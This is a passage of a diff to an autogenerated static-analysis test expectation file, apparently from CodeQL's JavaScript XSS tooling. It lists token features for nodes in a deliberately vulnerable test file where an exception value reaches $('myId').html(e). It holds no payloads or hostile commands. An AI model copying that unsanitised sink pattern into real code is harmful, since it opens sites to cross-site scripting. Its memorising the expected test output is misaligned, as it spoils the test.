resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19023,6 +129097,36 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:86:17:86:19 | foo | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:86:17:86:19 | foo | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:86:17:86:19 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:3:89:9 | unknown | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:3:89:9 | unknown | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:3:89:9 | unknown | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:3:89:9 | unknown | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:3:89:9 | unknown | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:3:89:27 | exceptional return of unknown ... /foo/)) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:3:89:27 | exceptional return of unknown ... /foo/)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:3:89:27 | exceptional return of unknown ... /foo/)) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:3:89:27 | exceptional return of unknown ... /foo/)) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:3:89:27 | exceptional return of unknown ... /foo/)) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:3:89:27 | unknown ... /foo/)) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:3:89:27 | unknown ... /foo/)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:3:89:27 | unknown ... /foo/)) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:3:89:27 | unknown ... /foo/)) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:3:89:27 | unknown ... /foo/)) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:11:89:13 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:11:89:13 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:11:89:13 | foo | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:11:89:13 | foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:11:89:13 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:11:89:19 | foo.match | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:11:89:19 | foo.match | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:11:89:19 | foo.match | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:11:89:19 | foo.match | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:11:89:19 | foo.match | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:11:89:26 | exceptional return of foo.match(/foo/) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:11:89:26 | exceptional return of foo.match(/foo/) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:11:89:26 | exceptional return of foo.match(/foo/) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:11:89:26 | exceptional return of foo.match(/foo/) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:11:89:26 | exceptional return of foo.match(/foo/) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:89:11:89:26 | foo.match(/foo/) | CalleeFlexibleAccessPath | unknown | | autogenerated/Xss/ExceptionXss/exception-xss.js:89:11:89:26 | foo.match(/foo/) | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:89:11:89:26 | foo.match(/foo/) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19030,6 +129134,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:89:11:89:26 | foo.match(/foo/) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:89:11:89:26 | foo.match(/foo/) | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:89:11:89:26 | foo.match(/foo/) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:15:89:19 | match | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:15:89:19 | match | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:15:89:19 | match | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:15:89:19 | match | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:89:15:89:19 | match | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:89:21:89:25 | /foo/ | CalleeFlexibleAccessPath | foo.match | | autogenerated/Xss/ExceptionXss/exception-xss.js:89:21:89:25 | /foo/ | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:89:21:89:25 | /foo/ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19038,6 +129147,46 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:89:21:89:25 | /foo/ | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:89:21:89:25 | /foo/ | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:89:21:89:25 | /foo/ | receiverName | foo | +| autogenerated/Xss/ExceptionXss/exception-xss.js:90:11:90:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:90:11:90:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:90:11:90:11 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:90:11:90:11 | e | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:90:11:90:11 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:90:11:90:11 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:90:11:90:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:90:11:90:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:90:11:90:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:90:11:90:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:3 | $ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:3 | $ | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:3 | $ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:11 | $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:11 | $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:11 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:11 | $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:11 | exceptional return of $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:11 | exceptional return of $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:11 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:11 | exceptional return of $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:16 | $('myId').html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:16 | $('myId').html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:16 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:16 | $('myId').html | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:19 | $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:19 | $('myId').html(e) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:19 | $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:19 | $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:19 | $('myId').html(e) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:19 | exceptional return of $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:19 | exceptional return of $('myId').html(e) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:19 | exceptional return of $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:19 | exceptional return of $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:3:91:19 | exceptional return of $('myId').html(e) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:91:5:91:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/ExceptionXss/exception-xss.js:91:5:91:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:91:5:91:10 | 'myId' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19045,6 +129194,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:91:5:91:10 | 'myId' | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:91:5:91:10 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:91:5:91:10 | 'myId' | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:13:91:16 | html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:13:91:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:13:91:16 | html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:13:91:16 | html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:91:13:91:16 | html | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:91:18:91:18 | e | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/ExceptionXss/exception-xss.js:91:18:91:18 | e | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:91:18:91:18 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19052,6 +129206,21 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:91:18:91:18 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:91:18:91:18 | e | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:91:18:91:18 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:95:3:95:9 | unknown | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:95:3:95:9 | unknown | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:95:3:95:9 | unknown | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:95:3:95:9 | unknown | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:95:3:95:9 | unknown | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:95:3:95:23 | exceptional return of unknown ... "bar"]) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:95:3:95:23 | exceptional return of unknown ... "bar"]) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:95:3:95:23 | exceptional return of unknown ... "bar"]) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:95:3:95:23 | exceptional return of unknown ... "bar"]) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:95:3:95:23 | exceptional return of unknown ... "bar"]) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:95:3:95:23 | unknown ... "bar"]) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:95:3:95:23 | unknown ... "bar"]) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:95:3:95:23 | unknown ... "bar"]) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:95:3:95:23 | unknown ... "bar"]) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:95:3:95:23 | unknown ... "bar"]) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:95:11:95:22 | [foo, "bar"] | CalleeFlexibleAccessPath | unknown | | autogenerated/Xss/ExceptionXss/exception-xss.js:95:11:95:22 | [foo, "bar"] | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:95:11:95:22 | [foo, "bar"] | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19060,15 +129229,65 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:95:11:95:22 | [foo, "bar"] | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:95:11:95:22 | [foo, "bar"] | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:95:12:95:14 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:95:12:95:14 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:95:12:95:14 | foo | contextSurroundingFunctionParameters | | | autogenerated/Xss/ExceptionXss/exception-xss.js:95:12:95:14 | foo | contextSurroundingFunctionParameters | () | | autogenerated/Xss/ExceptionXss/exception-xss.js:95:12:95:14 | foo | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:95:12:95:14 | foo | enclosingFunctionBody | foo document location inner 